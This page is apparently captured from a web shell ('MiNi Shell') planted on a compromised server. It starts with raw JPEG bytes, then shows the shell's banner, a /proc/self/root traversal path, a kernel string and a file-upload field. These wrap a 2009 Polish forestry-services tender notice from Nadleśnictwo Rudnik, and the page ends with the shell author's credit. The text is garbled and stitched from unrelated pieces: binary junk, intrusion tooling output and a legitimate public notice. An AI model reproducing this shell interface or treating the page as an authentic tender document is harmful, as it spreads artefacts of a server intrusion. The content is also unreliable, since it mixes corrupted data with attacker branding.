JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090205/33949-N-2009.html

<p class="kh_header"><b>Rudnik nad Sanem: Usługi z zakresu gospodarki leśnej w 2009r.</b><br>
<b>Numer ogłoszenia: 33949 - 2009; data zamieszczenia: 05.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Rudnik , ul. Rzeszowska 134, 37-420 Rudnik nad Sanem, woj. podkarpackie, tel. 015 8766211.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.lublin.lasy.gov.pl/web/rudnik</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi z zakresu gospodarki leśnej w 2009r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie prac z zakresu gospodarki leśnej objętych planem finansowo gospodarczym na 2009 r., /kod CPV 77200000-2. Prace dotyczą ochrony lasu, szkółkarstwa, gospodarki łowieckiej /kod CPV  77211600-8, 77231000-8.
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2, 77.23.10.00-8, 77.21.16.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium:

- w wysokości 1300,00 PLN (słownie jeden tysiąc trzysta złotych)


Wadium może być wniesione w następujących formach:
-	pieniądzu;
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	gwarancjach bankowych;
-	gwarancjach ubezpieczeniowych;
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U nr 109/00 poz. 1158 z późniejszymi zmianami).
Wadium w formie pieniężnej należy wpłacić przelewem (nie gotówką) na rachunek bankowy Zamawiającego  w banku BGŻ SA Oddział Stalowa Wola nr 34-2030-0045-1110-0000-0021-2990. 
Wadium wniesione w  pozostałych formach, należy w oryginale  złożyć w  pokoju nr 3 w siedzibie Zamawiającego (kasa), lub dołączyć do oferty. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób czytelny umożliwiający jego identyfikację (np. złożony wraz z imienną pieczątką lub czytelny z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium na zasadach określonych w art. 46 ust. 5  ustawy Prawo Zamówień Publicznych.
Wadium musi być wniesione przed upływem terminu składania ofert. Dowód potwierdzający wniesienie wadium należy dołączyć do oferty. Oferta nie zabezpieczona akceptowaną formą wadium zostanie odrzucona.
Zamawiający zwróci niezwłocznie wadium, jeżeli:
1)	upłynie  termin związania ofertą,
2)	zostanie zawarta umowa w sprawie prowadzonego zamówienia,   
3)	unieważni postępowanie, a protesty zostaną ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
Ponadto Zamawiający zwróci wadium na wniosek Wykonawcy:
1)	który, przed upływem terminu składania ofert wycofał ofertę,
2)	który, został wykluczony z postępowania,
3)	którego oferta została odrzucona.
Zamawiający zatrzyma wadium, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówi podpisania umowy na warunkach określonych w ofercie,
2)	sprawi, że zawarcie umowy stanie się niemożliwe z przyczyn leżących po jego stronie.
Zamawiający również zatrzyma wadium, jeżeli Wykonawca w odpowiedzi na wezwanie do uzupełnienia  dokumentów i oświadczeń na okoliczność spełnienia warunków udziału w postępowaniu lub pełnomocnictw nie złoży wymaganych dokumentów z przyczyn leżących po jego stronie.
Zamawiający zażąda, w wyznaczonym przez siebie terminie, ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie art. 46 ust. 2 pkt 2 i 3 Prawa zamówień publicznych, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty.
Wadium wniesione w pieniądzu, zamawiający przechowa na rachunku bankowym i zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie moga ubiegać się Wykonawcy:
1.Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust 1  i ust. 2  Prawa Zamówień Publicznych;
2.Spełniają warunki określone w art.22 ust.1 pkt 1-3 ustawy Prawo zamówień Publicznych, a w szczególności:a)Występują w obrocie prawnym; b) wykonali, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a gdy okres prowadzenia działalności jest krótszy -  w tym okresie, co najmniej  dwie usługi (2 umowy ) odpowiadające swoim  rodzajem i wartością usługom stanowiącym przedmiot zamówienia, jednocześnie odpowiednio potwierdzone, że zostały wykonane należycie. W stosunku do w/w zamówienia obejmującego usługi z zakresu prac szkółkarskich  Wykonawca musi się wykazać wykonaniem  prac z tego zakresu na kwotę średniorocznie co najmniej 70 tysięcy złotych.;c)W stosunku do w/w  zamówienia dysponują lub będą dysponować 4 osobowym zespołem roboczym w tym co najmniej 1  osobą  przeszkoloną  w zakresie stosowania środków chemicznych, oraz 2 osobami z uprawnieniami do kierowania ciągnikami rolniczymi.;d)dysponują niżej wymienionym sprzętem i urządzeniami:
- co najmniej dwoma  ciągnikami rolniczymi.;e) Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Wykaże że dysponuje gotówką na podstawowym rachunku bankowym w wysokości co najmniej 25 000 zł lub zdolność kredytową na w/w kwotę.
W przypadku wspólnego ubiegania się o zamówienie Wykonawcy: spełnia wymogi z punktu 1.;2;2.a;-każdy oddzielnie.Pozostałe warunki łącznie.

Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.aktualne zaświadczenia: właściwego naczelnika US oraz  właściwego oddziału ZUS lub KRUS potwierdzające, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert).;2.aktualną informację z Krajowego Rejestru Karnego w zakresie określonym art. 24 ust., 1 pkt  4-8  ustawy Prawo Zamówień Publicznych - wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (informacja oddzielnie dotyczy osób fizycznych - właścicieli, współwłaścicieli, oddzielnie dotyczy urzędujących członków władz osób prawnych).;3.aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo Zamówień Publicznych, (wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania  ofert).;4.oświadczenie o nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1  i ust. 2  Prawa Zamówień Publicznych i spełnianiu warunków określonych w art.22 ust.1 pkt 1-3 ustawy Prawo zamówień Publicznych-załącznik nr 3 do SIWZ.;5.aktualny odpis z właściwego rejestru przedsiębiorców lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej  (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert);6.wykaz wykonanych w ciągu ostatnich trzech lat usług, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich  wartości, dat wykonania, miejsca wykonania.
- na formularzu  zał. nr 5 do SIWZ, ;7.dokumenty potwierdzające należyte wykonanie co najmniej 2 zamówień,;8.wykaz osób, którymi dysponuje wykonawca lub będzie dysponował, wraz z informacją na temat ich kwalifikacji  - na formularzu zał. nr 6,( oraz pisemne zobowiązanie innych podmiotów do udostępniania osób zdolnych  do wykonania zamówienia jeśli w wykazie wykonawca wskazał osoby którymi będzie dysponował);9.wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje lub będzie dysponował Wykonawca - formularz zał. Nr 7 ( oraz pisemne zobowiązanie innych podmiotów do udostępniania niezbędnych do wykonania zamówienia narzędzi i urządzeń jeśli w wykazie wykonawca wskazał narzędzia i urządzenia którymi będzie dysponował);10.Informacja z banku lub spółdzielczej kasy oszczędnościowo kredytowej potwierdzające wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy-wystawione nie wcześniej niż na 3 miesiące przed terminem składania ofert.;
W przypadku wspólnego ubiegania sie o zamówienie:oświadczenia i dokumenty jak w punkcie:1;2;3;4;5-każdy oddzielnie.Pozostałe oświadczenia i dokumenty łącznie.
Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez upełnomocnionego przedstawiciela wykonawcy.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.lublin.lasy.gov.pl/web/rudnik.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Rudnik  , ul. Rzeszowska134,  Rudnik nad Sanem 37-420;.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2009 godzina 10:00, miejsce: Nadleśnictwo Rudnik  , ul. Rzeszowska134,  Rudnik nad Sanem 37-420;sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com